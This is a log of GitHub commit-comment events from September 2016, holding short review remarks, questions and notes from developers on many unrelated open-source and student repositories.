{"id":"4579167840","type":"CommitCommentEvent","actor":{"login":"whummer"},"repo":{"name":"patanachai/themis"},"payload":{"comment":{"id":19068850,"position":null,"line":null,"path":null,"commit_id":"c64c60549f9c1a1f5760477a5561210fa3a809e2","created_at":"2016-09-18T03:48:57Z","updated_at":"2016-09-18T03:48:57Z","body":"@patanachai This commit contains some very important changes (support for custom domain names). Would you be willing to raise a PR against the base repo?\r\n\r\nIt would be great to work on this together, and try to make Themis generic and more usable for everybody. Thanks"}},"created_at":"2016-09-18T03:48:57Z"}
{"id":"4579170326","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"japanesemediamanager/jmmserver"},"payload":{"comment":{"id":19068859,"position":null,"line":null,"path":null,"commit_id":"f4a8bd03404e1ab43458241d7292b4dfed1408a7","created_at":"2016-09-18T03:51:02Z","updated_at":"2016-09-18T03:51:02Z","body":"You copied them wrong. I had to look up the old code and change it."}},"created_at":"2016-09-18T03:51:02Z"}
{"id":"4579171020","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"japanesemediamanager/jmmserver"},"payload":{"comment":{"id":19068860,"position":null,"line":null,"path":null,"commit_id":"f4a8bd03404e1ab43458241d7292b4dfed1408a7","created_at":"2016-09-18T03:51:36Z","updated_at":"2016-09-18T03:51:36Z","body":"I noticed with watched status not working and saw that it was not bound to the right address"}},"created_at":"2016-09-18T03:51:36Z"}
{"id":"4579172907","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19068865,"position":null,"line":null,"path":null,"commit_id":"a5bcce5a69ebd8d4c295d5a1586df1b1dd36ffd8","created_at":"2016-09-18T03:53:08Z","updated_at":"2016-09-18T03:53:08Z","body":"The fourth fix is that of Captain for:\r\n`opkg install packagedoesnotexist packageexists`\r\nled to _packageexists_ not being installed as opkg stopped on the non-existant package _packagedoesnotexist_<br>\r\nThat was one of the other insane checks opkg 0.3.x introduced compared to 0.2.x, so as it's the same topic, I incorporated it inside my _0.3.1_make_insane_patches_nonfatal.patch_ patch (Should have been .0.3.1_make_insane_checks_nonfatal.patch)."}},"created_at":"2016-09-18T03:53:08Z"}
{"id":"4579176087","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19068870,"position":null,"line":null,"path":null,"commit_id":"ad43443ecf37556c2f174a8598a8adc04a36859f","created_at":"2016-09-18T03:55:02Z","updated_at":"2016-09-18T03:55:02Z","body":"++"}},"created_at":"2016-09-18T03:55:02Z"}
{"id":"4579176549","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"iTXTech/PocketMine-MP"},"payload":{"comment":{"id":19068871,"position":64,"line":101,"path":"src/pocketmine/block/SignPost.php","commit_id":"a92037b09f2c5494d309687d5e0cf6ef577296c6","created_at":"2016-09-18T03:55:09Z","updated_at":"2016-09-18T03:55:09Z","body":"#BlameShoghi"}},"created_at":"2016-09-18T03:55:09Z"}
{"id":"4579178435","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19068875,"position":null,"line":null,"path":null,"commit_id":"45bc17d41b40f271dd5ebb2357e7f3564f969007","created_at":"2016-09-18T03:55:42Z","updated_at":"2016-09-18T03:55:42Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-18T03:55:42Z"}
{"id":"4579178917","type":"CommitCommentEvent","actor":{"login":"paddor"},"repo":{"name":"booksbyus/zguide"},"payload":{"comment":{"id":19068878,"position":18,"line":18,"path":"examples/C/pathosub.c","commit_id":"6868ee254fa49bd0afe40ace10e9388a87f68c59","created_at":"2016-09-18T03:56:09Z","updated_at":"2016-09-18T03:56:09Z","body":"You should be able to see the code [here](https://github.com/booksbyus/zguide/commit/6868ee254fa49bd0afe40ace10e9388a87f68c59#commitcomment-19066453)\r\n\r\nA few lines down the char array is compared by `streq (topic, subscription)` and AFAIK that could be unsafe, or at least only be correct if the first garbage byte is zero. "}},"created_at":"2016-09-18T03:56:09Z"}
{"id":"4579179252","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/electron"},"payload":{"comment":{"id":19068879,"position":null,"line":null,"path":null,"commit_id":"3194d86fcc669c79ee704cf83d1f1982606c9ebc","created_at":"2016-09-18T03:56:26Z","updated_at":"2016-09-18T03:56:26Z","body":"++"}},"created_at":"2016-09-18T03:56:26Z"}
{"id":"4579179559","type":"CommitCommentEvent","actor":{"login":"robertmassaioli"},"repo":{"name":"kriasoft/react-starter-kit"},"payload":{"comment":{"id":19068881,"position":null,"line":null,"path":null,"commit_id":"689a81f6362b52f9cba417a4cd147a915565534e","created_at":"2016-09-18T03:56:46Z","updated_at":"2016-09-18T03:56:46Z","body":"@koistya Why did you choose to use JWT Tokens stored in the cookies instead of passport.session as recommended in the passport docs? http://passportjs.org/docs/configure\r\n\r\nI'm trying to figure out what the reason was?"}},"created_at":"2016-09-18T03:56:46Z"}
{"id":"4579180187","type":"CommitCommentEvent","actor":{"login":"steida"},"repo":{"name":"ReactTraining/react-router"},"payload":{"comment":{"id":19068885,"position":null,"line":null,"path":null,"commit_id":"a533fbc08be365dd70880b42fa62cc2e6d20b232","created_at":"2016-09-18T03:57:16Z","updated_at":"2016-09-18T03:57:16Z","body":"Please consider https://github.com/airbnb/javascript. It is the standard: > 40 000 stars. Nevertheless, it's nicely strictly. And it also checks... a lot of JSX stuff."}},"created_at":"2016-09-18T03:57:16Z"}
{"id":"4579183402","type":"CommitCommentEvent","actor":{"login":"auboliuxin"},"repo":{"name":"ros/rosdistro"},"payload":{"comment":{"id":19068893,"position":null,"line":null,"path":null,"commit_id":"144c7fcfbdebdb49afc0783b6ebea1c693fc372a","created_at":"2016-09-18T04:00:08Z","updated_at":"2016-09-18T04:00:08Z","body":"add aubo_robot to documentation index for distro"}},"created_at":"2016-09-18T04:00:08Z"}
{"id":"4579189364","type":"CommitCommentEvent","actor":{"login":"frasertweedale"},"repo":{"name":"tiran/cpython"},"payload":{"comment":{"id":19068903,"position":10,"line":321,"path":"Lib/test/test_ssl.py","commit_id":"40b16f1a110c70b71546f50437a7d8f61f88ed52","created_at":"2016-09-18T04:03:57Z","updated_at":"2016-09-18T04:03:57Z","body":"Not a fan of this string tagging - of course that's the already supported GeneralName types\r\nare using and they can't be changed for compatibility reasons - and to do otherwise would\r\nmean the approach is inconsistent.\r\n\r\nOn the other hand, it is *also* inconsistent that \"known\" otherNames are referenced by some\r\nparticular string, whereas \"unknown\" otherNames are referenced by OID.\r\n\r\nSo my two cents: always use OID for otherName, and create \"constants\" for mapping\r\n\"known othername types\" to their OID, e.g. `ID_ON_SRVNAME` or `SAN_OTHERNAME_SRVNAME`\r\nor something along those lines."}},"created_at":"2016-09-18T04:03:57Z"}
{"id":"4579193246","type":"CommitCommentEvent","actor":{"login":"bananabot1024"},"repo":{"name":"evhsnewspaper-cougar-chronicles/evhsnewspaper-cougar-chronicles.github.io"},"payload":{"comment":{"id":19068916,"position":null,"line":null,"path":null,"commit_id":"100d6e5796185d7e9bc7bc06009e7743da6e9dd0","created_at":"2016-09-18T04:07:26Z","updated_at":"2016-09-18T04:07:26Z","body":"what do you mean by \"tried html import and js for fixed navbar but didn't work\"?"}},"created_at":"2016-09-18T04:07:26Z"}
{"id":"4579201264","type":"CommitCommentEvent","actor":{"login":"donpdonp"},"repo":{"name":"nodemcu/nodemcu-firmware"},"payload":{"comment":{"id":19068938,"position":5,"line":14,"path":"docs/en/modules/ws2812.md","commit_id":"3f418f995cfccbaf7a745e65c81251c4c50759e6","created_at":"2016-09-18T04:15:03Z","updated_at":"2016-09-18T04:15:03Z","body":"I'm using an ESP-06 module with NodeMCU 0.9.6. Controlling a ws2812 works on at least gpio4 and gpio14."}},"created_at":"2016-09-18T04:15:03Z"}
{"id":"4579202606","type":"CommitCommentEvent","actor":{"login":"praiskup"},"repo":{"name":"fedora-copr/copr"},"payload":{"comment":{"id":19068941,"position":2,"line":2,"path":"beaker-tests/Regression/backend/distgit-files/var/lib/dist-git/git/rpms/@copr/copr-dev/example.git/objects/53/677fae27782b4e970ce11e9fbf2523f7081b8d","commit_id":"a69c1789fcb1a3cf8f64650a3f6e84fcdd07fb5b","created_at":"2016-09-18T04:16:15Z","updated_at":"2016-09-18T04:16:15Z","body":"Please put into VCS only sources.  That's my wish.\r\nNot only the size, but also unpredictable content is a good reason to avoid binaries in VCS.  I'm obviously missing \r\nsomething important here in this case, but in general - please."}},"created_at":"2016-09-18T04:16:15Z"}
{"id":"4579205467","type":"CommitCommentEvent","actor":{"login":"lamphc"},"repo":{"name":"lamphc/gulp-less-flexible"},"payload":{"comment":{"id":19068946,"position":15,"line":63,"path":"README.md","commit_id":"084b89f7238223c1b75a2d66b3f413c01fe48fc0","created_at":"2016-09-18T04:18:36Z","updated_at":"2016-09-18T04:18:36Z","body":"静态服务器"}},"created_at":"2016-09-18T04:18:36Z"}
{"id":"4579207490","type":"CommitCommentEvent","actor":{"login":"aviraxp"},"repo":{"name":"halogenOS/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":19068951,"position":69,"line":195,"path":"system.prop","commit_id":"cd81cdbd30c86acb987fd78ec71979e414a38062","created_at":"2016-09-18T04:20:39Z","updated_at":"2016-09-18T04:20:39Z","body":"No such tweaks in aosp repo. Maybe some modified rom tweak."}},"created_at":"2016-09-18T04:20:39Z"}
{"id":"4579208152","type":"CommitCommentEvent","actor":{"login":"petronny"},"repo":{"name":"archlinuxcn/lilac"},"payload":{"comment":{"id":19068953,"position":20,"line":94,"path":"lilac","commit_id":"02ab182693a8de97419366b8ffb328c1792432ff","created_at":"2016-09-18T04:21:17Z","updated_at":"2016-09-18T04:21:17Z","body":"If the optional host and port parameters are given, the SMTP connect() method is called with those parameters during initialization. [1]\r\n\r\n[1] https://docs.python.org/3/library/smtplib.html"}},"created_at":"2016-09-18T04:21:17Z"}
{"id":"4579208485","type":"CommitCommentEvent","actor":{"login":"aviraxp"},"repo":{"name":"halogenOS/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":19068955,"position":58,"line":184,"path":"system.prop","commit_id":"cd81cdbd30c86acb987fd78ec71979e414a38062","created_at":"2016-09-18T04:21:39Z","updated_at":"2016-09-18T04:21:39Z","body":"No need for the tweaks. Default is 0."}},"created_at":"2016-09-18T04:21:39Z"}
{"id":"4579208836","type":"CommitCommentEvent","actor":{"login":"xtne6f"},"repo":{"name":"xtne6f/EDCB"},"payload":{"comment":{"id":19068957,"position":null,"line":null,"path":null,"commit_id":"0771bd44a8ab25df7c37eef5fa9fda609309afa5","created_at":"2016-09-18T04:21:58Z","updated_at":"2016-09-18T04:21:58Z","body":"怖いです。加えてロック関係はあさっての方向に発症したり、不具合が起きる**とも限らない**というあたりが\r\nエンバグしても多くは自爆で気づきますが、しばしばやらかします"}},"created_at":"2016-09-18T04:21:58Z"}
{"id":"4579210152","type":"CommitCommentEvent","actor":{"login":"jasonm23"},"repo":{"name":"gaqzi/radish"},"payload":{"comment":{"id":19068962,"position":null,"line":null,"path":null,"commit_id":"29e5beb15b89f8fc63e3ae26abc7e6c0c50695a6","created_at":"2016-09-18T04:23:12Z","updated_at":"2016-09-18T04:23:12Z","body":"That's the stuff :)"}},"created_at":"2016-09-18T04:23:12Z"}
{"id":"4579212563","type":"CommitCommentEvent","actor":{"login":"MacGyverr"},"repo":{"name":"MacGyverr/skin.metropolis"},"payload":{"comment":{"id":19068965,"position":null,"line":null,"path":null,"commit_id":"6a65b8b87274ee2d08814bd5be3a9cf8f82833e4","created_at":"2016-09-18T04:25:35Z","updated_at":"2016-09-18T04:25:35Z","body":"![screenshot001](https://cloud.githubusercontent.com/assets/6500800/18612886/3af5b650-7d1d-11e6-8dd0-1998c7f31b64.jpg)\r\n"}},"created_at":"2016-09-18T04:25:35Z"}
{"id":"4579215551","type":"CommitCommentEvent","actor":{"login":"covers1624"},"repo":{"name":"TheCBProject/CodeChickenLib"},"payload":{"comment":{"id":19068969,"position":53,"line":86,"path":"src/main/java/codechicken/lib/render/block/BlockRenderingRegistry.java","commit_id":"c1b691dfa2728a44be870b864943d45f8bfaac74","created_at":"2016-09-18T04:28:20Z","updated_at":"2016-09-18T04:28:20Z","body":"Why remove public from these.. If someone calls it handle it."}},"created_at":"2016-09-18T04:28:20Z"}
{"id":"4579217941","type":"CommitCommentEvent","actor":{"login":"Irenebode"},"repo":{"name":"Irenebode/IBHub"},"payload":{"comment":{"id":19068971,"position":57,"line":57,"path":"changelog.htm","commit_id":"c2bd437be720d593f69de2dc344609e7b2b543e9","created_at":"2016-09-18T04:30:29Z","updated_at":"2016-09-18T04:30:29Z","body":"asdf"}},"created_at":"2016-09-18T04:30:29Z"}
{"id":"4579218134","type":"CommitCommentEvent","actor":{"login":"davvid"},"repo":{"name":"git-cola/git-cola"},"payload":{"comment":{"id":19068972,"position":13,"line":50,"path":"test/settings_test.py","commit_id":"9e883196bec630f1aee311e87055ca6b2f43cdfb","created_at":"2016-09-18T04:30:40Z","updated_at":"2016-09-18T04:30:40Z","body":"On this line and various others in this PR there's a small style nit.  Add a single space after commas in expressions."}},"created_at":"2016-09-18T04:30:40Z"}
{"id":"4579218948","type":"CommitCommentEvent","actor":{"login":"aviraxp"},"repo":{"name":"halogenOS/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":19068973,"position":18,"line":137,"path":"system.prop","commit_id":"cd81cdbd30c86acb987fd78ec71979e414a38062","created_at":"2016-09-18T04:31:26Z","updated_at":"2016-09-18T04:31:26Z","body":"Won't work."}},"created_at":"2016-09-18T04:31:26Z"}
{"id":"4579218969","type":"CommitCommentEvent","actor":{"login":"Artoria2e5"},"repo":{"name":"AOSC-Dev/aosc-os-artworks"},"payload":{"comment":{"id":19068974,"position":47,"line":149,"path":"Makefile","commit_id":"87b06d8149dc70d4d796eff3a39464e8f6c6248a","created_at":"2016-09-18T04:31:27Z","updated_at":"2016-09-18T04:31:27Z","body":"怎么 Makefile 开始流行冒号左边有空格风格了……"}},"created_at":"2016-09-18T04:31:27Z"}
{"id":"4579220400","type":"CommitCommentEvent","actor":{"login":"Artoria2e5"},"repo":{"name":"AOSC-Dev/aosc-os-artworks"},"payload":{"comment":{"id":19068978,"position":16,"line":47,"path":"Makefile","commit_id":"87b06d8149dc70d4d796eff3a39464e8f6c6248a","created_at":"2016-09-18T04:32:51Z","updated_at":"2016-09-18T04:32:51Z","body":"比值加点下划线啊拜托……"}},"created_at":"2016-09-18T04:32:51Z"}
{"id":"4579220448","type":"CommitCommentEvent","actor":{"login":"mihirgarg"},"repo":{"name":"NIIT-Software-Engineering/Prateek-Mishra-Mihir-Garg-Shubham-Singh-vishal-Rohan-Srivastav"},"payload":{"comment":{"id":19068979,"position":null,"line":null,"path":null,"commit_id":"a849edb7d0787a77405d344d5a29e5cc502fdb2d","created_at":"2016-09-18T04:32:53Z","updated_at":"2016-09-18T04:32:53Z","body":"M"}},"created_at":"2016-09-18T04:32:53Z"}
{"id":"4579221099","type":"CommitCommentEvent","actor":{"login":"Artoria2e5"},"repo":{"name":"AOSC-Dev/aosc-os-artworks"},"payload":{"comment":{"id":19068980,"position":21,"line":141,"path":"Makefile","commit_id":"09d93d34677abbc75443cdccbaee0f0b3fd99bea","created_at":"2016-09-18T04:33:35Z","updated_at":"2016-09-18T04:33:35Z","body":"硬……硬点起来了……"}},"created_at":"2016-09-18T04:33:35Z"}
{"id":"4579221142","type":"CommitCommentEvent","actor":{"login":"MrTJP"},"repo":{"name":"TheCBProject/CodeChickenLib"},"payload":{"comment":{"id":19068981,"position":53,"line":86,"path":"src/main/java/codechicken/lib/render/block/BlockRenderingRegistry.java","commit_id":"c1b691dfa2728a44be870b864943d45f8bfaac74","created_at":"2016-09-18T04:33:38Z","updated_at":"2016-09-18T04:33:38Z","body":"Always good to set proper access controls on classes that will be called publicly... We don't want these methods to be called from the outside EVER."}},"created_at":"2016-09-18T04:33:38Z"}
{"id":"4579223579","type":"CommitCommentEvent","actor":{"login":"davvid"},"repo":{"name":"git-cola/git-cola"},"payload":{"comment":{"id":19068985,"position":30,"line":66,"path":"test/settings_test.py","commit_id":"9e883196bec630f1aee311e87055ca6b2f43cdfb","created_at":"2016-09-18T04:35:59Z","updated_at":"2016-09-18T04:35:59Z","body":"Drop the space after `{`, before `:`, and before `}` above.  e.g.\r\n```python\r\n\r\nbookmark = {'path': '/tmp/this/does/not/exist', 'name': 'notexist'}\r\n\r\n```"}},"created_at":"2016-09-18T04:35:59Z"}
{"id":"4579224026","type":"CommitCommentEvent","actor":{"login":"MichaelSmeaton"},"repo":{"name":"MichaelSmeaton/top-secret"},"payload":{"comment":{"id":19068988,"position":null,"line":null,"path":null,"commit_id":"8ffddf045f24e754ddd17b9c609ab54b8fd41de0","created_at":"2016-09-18T04:36:25Z","updated_at":"2016-09-18T04:36:25Z","body":"Duplication\r\nStep 1 - Write testing code"}},"created_at":"2016-09-18T04:36:25Z"}
{"id":"4579224153","type":"CommitCommentEvent","actor":{"login":"Xverso111"},"repo":{"name":"Xverso111/JavaProject"},"payload":{"comment":{"id":19068989,"position":4,"line":0,"path":"src/AppleFilter.java","commit_id":"0eb0a6cfd9b96e337ba513f983c756f94c5041d8","created_at":"2016-09-18T04:36:33Z","updated_at":"2016-09-18T04:36:33Z","body":"crear una interfaz"}},"created_at":"2016-09-18T04:36:33Z"}
{"id":"4579227405","type":"CommitCommentEvent","actor":{"login":"demoneaux"},"repo":{"name":"feross/webtorrent-www"},"payload":{"comment":{"id":19068999,"position":30,"line":235,"path":"server/desktop-api.js","commit_id":"eb63b82de683c9b1236190bcba93da9f2136d9d5","created_at":"2016-09-18T04:39:57Z","updated_at":"2016-09-18T04:39:57Z","body":"Hmm, where does this redirect to? Not too sure actually about squirrel endpoints "}},"created_at":"2016-09-18T04:39:57Z"}
{"id":"4579229475","type":"CommitCommentEvent","actor":{"login":"Xverso111"},"repo":{"name":"Xverso111/JavaProject"},"payload":{"comment":{"id":19069010,"position":7,"line":0,"path":"src/AppleFilter.java","commit_id":"46e4f03f7cb60c49f0224913982d6955b3f9f837","created_at":"2016-09-18T04:41:54Z","updated_at":"2016-09-18T04:41:54Z","body":"quitar el modificador public en la interface"}},"created_at":"2016-09-18T04:41:54Z"}
{"id":"4579232954","type":"CommitCommentEvent","actor":{"login":"java-fancl"},"repo":{"name":"java-fancl/justtest"},"payload":{"comment":{"id":19069016,"position":null,"line":null,"path":null,"commit_id":"d1078c4b86d5207ff6d3b5263e8c50d6bd9dc37a","created_at":"2016-09-18T04:45:15Z","updated_at":"2016-09-18T04:45:15Z","body":"test 2016/9/18"}},"created_at":"2016-09-18T04:45:15Z"}
{"id":"4579236178","type":"CommitCommentEvent","actor":{"login":"aidan-fitz"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":19069028,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-18T04:48:25Z","updated_at":"2016-09-18T04:48:25Z","body":"@bokatan, @alolmeha is correct. Fan art is a _derivative work_ of the characters and stories it's based on, but it's not _owned_ by the creators of those characters and stories. If allowed under fair use (which you seem to be arguing that it ought to be, because it's free advertising), fan art is copyrighted by the person who made it."}},"created_at":"2016-09-18T04:48:25Z"}
{"id":"4579236396","type":"CommitCommentEvent","actor":{"login":"zachlittle"},"repo":{"name":"zachlittle/sourceclub"},"payload":{"comment":{"id":19069030,"position":null,"line":null,"path":null,"commit_id":"4a3168edc282eaef8bcb620b95659f967e680f9b","created_at":"2016-09-18T04:48:40Z","updated_at":"2016-09-18T04:48:40Z","body":"This coad meets A1 GOAT certification."}},"created_at":"2016-09-18T04:48:40Z"}
{"id":"4579239466","type":"CommitCommentEvent","actor":{"login":"Adam1609"},"repo":{"name":"diamond-gold/MiniBosses"},"payload":{"comment":{"id":19069042,"position":null,"line":null,"path":null,"commit_id":"3a3564d2fbd2c97478ff761265239e77ea590953","created_at":"2016-09-18T04:51:50Z","updated_at":"2016-09-18T04:51:50Z","body":"Could you please fix this, sometimes mob shows off, sometimes mob disappears"}},"created_at":"2016-09-18T04:51:50Z"}
{"id":"4579242017","type":"CommitCommentEvent","actor":{"login":"tonymuu"},"repo":{"name":"aws/aws-sdk-ios"},"payload":{"comment":{"id":19069053,"position":null,"line":null,"path":null,"commit_id":"d0154d3f1e1cc20fad8c7339208ee208f1d8c516","created_at":"2016-09-18T04:54:22Z","updated_at":"2016-09-18T04:54:22Z","body":"For some reason AWSCognitoIdentity+Fabric.h is saying 'AWSCognitoIdentity.h' file not found, and AWSFMDatabase+private.h is throwing the include of non-modular header inside framework module 'AWSCore' again"}},"created_at":"2016-09-18T04:54:22Z"}
{"id":"4579243380","type":"CommitCommentEvent","actor":{"login":"d2phap"},"repo":{"name":"d2phap/ImageGlass"},"payload":{"comment":{"id":19069060,"position":null,"line":null,"path":null,"commit_id":"8db94896301ab97b201374572c7e0b3f98d07ccb","created_at":"2016-09-18T04:55:41Z","updated_at":"2016-09-18T04:55:41Z","body":"Hi @s8321414 \r\n\r\nTake it easy!\r\nOnce you complete, I will update on ImageGlass website :)\r\n\r\nThanks!"}},"created_at":"2016-09-18T04:55:41Z"}
{"id":"4579244494","type":"CommitCommentEvent","actor":{"login":"leighmcculloch"},"repo":{"name":"lionelbarrow/braintree-go"},"payload":{"comment":{"id":19069061,"position":null,"line":null,"path":null,"commit_id":"85f29a72243c704221077d2177c094a7df566261","created_at":"2016-09-18T04:56:51Z","updated_at":"2016-09-18T04:56:51Z","body":"We should return the `err` when one is first encountered, rather than continue and return the last `err`."}},"created_at":"2016-09-18T04:56:51Z"}
{"id":"4579244797","type":"CommitCommentEvent","actor":{"login":"dkorolev"},"repo":{"name":"grixa/CTFO_BE"},"payload":{"comment":{"id":19069065,"position":21,"line":221,"path":"crunchers/test.cc","commit_id":"ea6f12a3a3498b8504ee7f2afb0914ea93d8e9fe","created_at":"2016-09-18T04:57:08Z","updated_at":"2016-09-18T04:57:08Z","body":"What's the use of `make_unique` here and below?"}},"created_at":"2016-09-18T04:57:08Z"}
{"id":"4579245025","type":"CommitCommentEvent","actor":{"login":"aulialigar"},"repo":{"name":"aulialigar/FormPendaftaran"},"payload":{"comment":{"id":19069066,"position":2,"line":2,"path":"README.md","commit_id":"f63e2fcd5a08a62074bc0bff7642a106e008a768","created_at":"2016-09-18T04:57:19Z","updated_at":"2016-09-18T04:57:19Z","body":"Aplikasi form tentang Pendataan Siswa SMK Telkom Malang Tahun Ajaran 2016-2017\r\nAplikasi ini berguna untuk mempermudah mendata siswa\r\nDi aplikasi ini terdapat deteksi kesalahan apabila anda belum mengisi atau memilih opsi\r\n![image](https://cloud.githubusercontent.com/assets/22268453/18612948/93ead006-7d95-11e6-949f-5cc79c4930d4.png)\r\n![image](https://cloud.githubusercontent.com/assets/22268453/18612954/c6dc9bca-7d95-11e6-9900-c06bff24e46f.png)\r\n![image](https://cloud.githubusercontent.com/assets/22268453/18612958/0317c448-7d96-11e6-8adb-fa0a42995992.png)\r\nAulia Ligar Salma Hanani, XI RPL 4, no 9, NIS 9991388519, SMK Telkom Malang "}},"created_at":"2016-09-18T04:57:19Z"}
{"id":"4579245560","type":"CommitCommentEvent","actor":{"login":"dkorolev"},"repo":{"name":"grixa/CTFO_BE"},"payload":{"comment":{"id":19069069,"position":44,"line":244,"path":"crunchers/test.cc","commit_id":"ea6f12a3a3498b8504ee7f2afb0914ea93d8e9fe","created_at":"2016-09-18T04:57:52Z","updated_at":"2016-09-18T04:57:52Z","body":"Is the `make_unique<>` necessary?"}},"created_at":"2016-09-18T04:57:52Z"}
{"id":"4579245701","type":"CommitCommentEvent","actor":{"login":"rodrial12"},"repo":{"name":"PopcornTimeTV/PopcornTimeTV"},"payload":{"comment":{"id":19069071,"position":null,"line":null,"path":null,"commit_id":"a60efb55fb5d81ffc5dace4b90eb8f4e0e9d14c3","created_at":"2016-09-18T04:58:02Z","updated_at":"2016-09-18T04:58:02Z","body":"How do I install the ipa on apple tv. ifunbox is not working"}},"created_at":"2016-09-18T04:58:02Z"}
{"id":"4579247371","type":"CommitCommentEvent","actor":{"login":"jlhitt"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19069072,"position":null,"line":null,"path":null,"commit_id":"ab9214aa4f04cbd46a2e7f4cf95f13f255937492","created_at":"2016-09-18T04:59:42Z","updated_at":"2016-09-18T04:59:42Z","body":"I noticed this earlier tonight and wanted to get it fixed and working correctly before it made it into the master branch."}},"created_at":"2016-09-18T04:59:42Z"}
{"id":"4579247518","type":"CommitCommentEvent","actor":{"login":"dkorolev"},"repo":{"name":"grixa/CTFO_BE"},"payload":{"comment":{"id":19069073,"position":81,"line":281,"path":"crunchers/test.cc","commit_id":"ea6f12a3a3498b8504ee7f2afb0914ea93d8e9fe","created_at":"2016-09-18T04:59:51Z","updated_at":"2016-09-18T04:59:51Z","body":"These should be `ASSERT_EQ`-s: If they fail, the test is best to not continue."}},"created_at":"2016-09-18T04:59:51Z"}
{"id":"4579247963","type":"CommitCommentEvent","actor":{"login":"sethtroisi"},"repo":{"name":"sethtroisi/arduino_lights"},"payload":{"comment":{"id":19069075,"position":null,"line":null,"path":null,"commit_id":"0246389920ca60bfac84a1c1a9e2caad0d6b8990","created_at":"2016-09-18T05:00:15Z","updated_at":"2016-09-18T05:00:15Z","body":"First checkin of LightConfig file which will hopefully help us deal with different config settings (num lights, brigthness, ...)"}},"created_at":"2016-09-18T05:00:15Z"}
{"id":"4579248049","type":"CommitCommentEvent","actor":{"login":"hsinyenwu"},"repo":{"name":"hsinyenwu/SeqAlign2"},"payload":{"comment":{"id":19069076,"position":null,"line":null,"path":null,"commit_id":"93c3786e80d33e52470b18f348949baf28a2945b","created_at":"2016-09-18T05:00:17Z","updated_at":"2016-09-18T05:00:17Z","body":"Sample output with the sequences in the test.zip folder"}},"created_at":"2016-09-18T05:00:17Z"}
{"id":"4579248158","type":"CommitCommentEvent","actor":{"login":"dkorolev"},"repo":{"name":"grixa/CTFO_BE"},"payload":{"comment":{"id":19069077,"position":106,"line":306,"path":"crunchers/test.cc","commit_id":"ea6f12a3a3498b8504ee7f2afb0914ea93d8e9fe","created_at":"2016-09-18T05:00:24Z","updated_at":"2016-09-18T05:00:24Z","body":"Here and below too."}},"created_at":"2016-09-18T05:00:24Z"}
{"id":"4579248569","type":"CommitCommentEvent","actor":{"login":"dkorolev"},"repo":{"name":"grixa/CTFO_BE"},"payload":{"comment":{"id":19069078,"position":198,"line":398,"path":"crunchers/test.cc","commit_id":"ea6f12a3a3498b8504ee7f2afb0914ea93d8e9fe","created_at":"2016-09-18T05:00:44Z","updated_at":"2016-09-18T05:00:44Z","body":"What's the obsession with `make_unique`? :)\r\n"}},"created_at":"2016-09-18T05:00:44Z"}
{"id":"4579249283","type":"CommitCommentEvent","actor":{"login":"dkorolev"},"repo":{"name":"grixa/CTFO_BE"},"payload":{"comment":{"id":19069079,"position":null,"line":null,"path":null,"commit_id":"ea6f12a3a3498b8504ee7f2afb0914ea93d8e9fe","created_at":"2016-09-18T05:01:18Z","updated_at":"2016-09-18T05:01:18Z","body":"@mzhurovich: LGTM, what do you think?"}},"created_at":"2016-09-18T05:01:18Z"}
{"id":"4579251714","type":"CommitCommentEvent","actor":{"login":"hsinyenwu"},"repo":{"name":"hsinyenwu/SeqAlign2"},"payload":{"comment":{"id":19069080,"position":null,"line":null,"path":null,"commit_id":"de4068e0330405caef4c218a0ca501e571ba0eeb","created_at":"2016-09-18T05:02:40Z","updated_at":"2016-09-18T05:02:40Z","body":"Sample pdf output with the sequences in the test.zip folder"}},"created_at":"2016-09-18T05:02:40Z"}
{"id":"4579252096","type":"CommitCommentEvent","actor":{"login":"nickdrozd"},"repo":{"name":"nickdrozd/lispinc"},"payload":{"comment":{"id":19069081,"position":null,"line":null,"path":null,"commit_id":"85f8ad2f91349c843a9dce576e6b67a829067f26","created_at":"2016-09-18T05:03:02Z","updated_at":"2016-09-18T05:03:02Z","body":"goddammit , this edit brought the \"C++\" count well over 50%"}},"created_at":"2016-09-18T05:03:02Z"}
{"id":"4579252772","type":"CommitCommentEvent","actor":{"login":"Atcold"},"repo":{"name":"e-lab/imagenet-multiGPU.torch"},"payload":{"comment":{"id":19069082,"position":14,"line":35,"path":"model.lua","commit_id":"8712ab0f1c6b3e284196807e10c46be7a6915f1e","created_at":"2016-09-18T05:03:46Z","updated_at":"2016-09-18T05:03:46Z","body":"OK."}},"created_at":"2016-09-18T05:03:46Z"}
{"id":"4579264937","type":"CommitCommentEvent","actor":{"login":"AndreyAkinshin"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19069102,"position":181,"line":32,"path":"src/BenchmarkDotNet.Core/Jobs/JobExtensions.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-18T05:14:49Z","updated_at":"2016-09-18T05:14:49Z","body":"Now you can write\r\n```cs\r\nWithIterationTime(200 * TimeInterval.Millisecond)\r\n```\r\nWhat do you think?"}},"created_at":"2016-09-18T05:14:49Z"}
{"id":"4579265274","type":"CommitCommentEvent","actor":{"login":"bajiravella"},"repo":{"name":"hasura-imad/imad-2016-app"},"payload":{"comment":{"id":19069107,"position":10,"line":12,"path":"index.html","commit_id":"f9f0c8c451e881027be6bb4445bf0ae06a99f26a","created_at":"2016-09-18T05:15:07Z","updated_at":"2016-09-18T05:15:07Z","body":"I im Baji ravella @@"}},"created_at":"2016-09-18T05:15:07Z"}
